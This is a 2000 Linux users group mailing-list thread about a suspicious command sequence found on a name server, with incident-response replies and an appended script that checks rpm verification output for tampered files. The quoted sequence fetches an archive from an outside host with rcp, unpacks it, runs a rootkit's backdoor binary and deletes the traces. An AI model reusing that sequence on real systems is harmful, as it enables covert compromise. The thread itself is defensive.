[lug] What does this mean?

Cory Dekker cory at sysmgrs.com
Tue Mar 21 00:10:31 MST 2000


You should also probably file a CERT incident, especially with respect
to linux7.europop.de, so that it is either recognized as a hacker box (not
likely) or the System Admin can be notified that their box has probably
been compromised (highly likely).

                                                -Cory


Tkil wrote:

> >>>>> "Shannon" == nunar  <nunar at mauromedia.net> writes:
>
> [reformatted for sanity]
>
> Shannon> I was going through my name server and somebody had entered this:
> Shannon> #   cd /tmp; \
> Shannon>        rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
> Shannon>        echo "* downloaded "; \
> Shannon>        tar xfz ak*; \
> Shannon>        cd ak; \
> Shannon>        ./backdoor/ls; \
> Shannon>        cd ..; \
> Shannon>        rm -rf ak*; \
> Shannon>        exit
>
> note that the only line which actually looks dangerous is the
> "./backdoor/ls" one; everything else should be pretty polite.
> (although, if they already have root... ouch.)
>
> Shannon> Does anybody know what this is doing to my system?
>
> short version: someone tried to run a rootkit against your box.  i
> can't tell offhand whether or not they succeeded, but you should
> probably "rm -rf /tmp/backup" at the very least.
>
> jafo says:  if you are running redhat, check the MD5 sums of all the
> packages on the box (this is an option to 'rpm'; consult the man page,
> but "--verify" should be close...)
>
> jafo also says:  consult the most excellent linux security howto.  (hi
> kev!)  accessible at:
>
>    http://www.tummy.com/security-howto/
>
> prepare to do a backup of important data (e.g. your named config
> files) and possibly do a full reinstall.  be absolutely sure you are
> running the latest versions of named and friends (BIND-*).  also,
> don't do a blind copy of the named config files; double-check that
> nobody is using your server who shouldn't be.
>
> t.
>
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

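As an added illustration of the rpm verification step Tkil passes along (this is not part of the original thread, and `suspicious_rpm_changes` is a name chosen here): the script below reads `rpm -Va` style output, assumed to be the format with nine verify flags, an optional attribute column such as `c` for config files, then the path, and prints the non-config files whose size or MD5 digest no longer matches the package database, plus files that are missing outright. The sample output is constructed; on a real box you would pipe `rpm -Va` into the function instead.

```shell
#!/bin/sh
# Constructed sample of `rpm -Va` output (assumed format: nine verify flags,
# an attribute column such as "c" for config files, then the path).
# On a real box:  rpm -Va 2>/dev/null | suspicious_rpm_changes
SAMPLE_RPM_VA='S.5....T.    /bin/ls
.......T.  c /etc/named.conf
S.5....T.  c /etc/passwd
missing     /sbin/ifconfig
.M.......    /usr/bin/top
S.5....T.    /usr/sbin/named'

# Print paths worth a closer look: any non-config file whose size (S) or
# MD5 digest (5) differs from what the package database recorded, and any
# packaged file that is missing entirely.  Config files (attribute "c")
# change legitimately and need manual review, so they are skipped here.
# Caveat: if rpm itself or its database was replaced, this tells you nothing.
suspicious_rpm_changes() {
    while read -r flags attr rest; do
        # Lines without an attribute column put the path in $attr.
        case "$attr" in
            [cdglr]) path=$rest ;;
            *)       path=$attr; attr="" ;;
        esac
        [ -n "$path" ] || continue
        case "$flags" in
            missing)
                printf '%-9s %s\n' "MISSING" "$path"
                ;;
            *S*|*5*)
                [ "$attr" = "c" ] && continue
                printf '%-9s %s\n' "MODIFIED" "$path"
                ;;
        esac
    done
}

printf '%s\n' "$SAMPLE_RPM_VA" | suspicious_rpm_changes
```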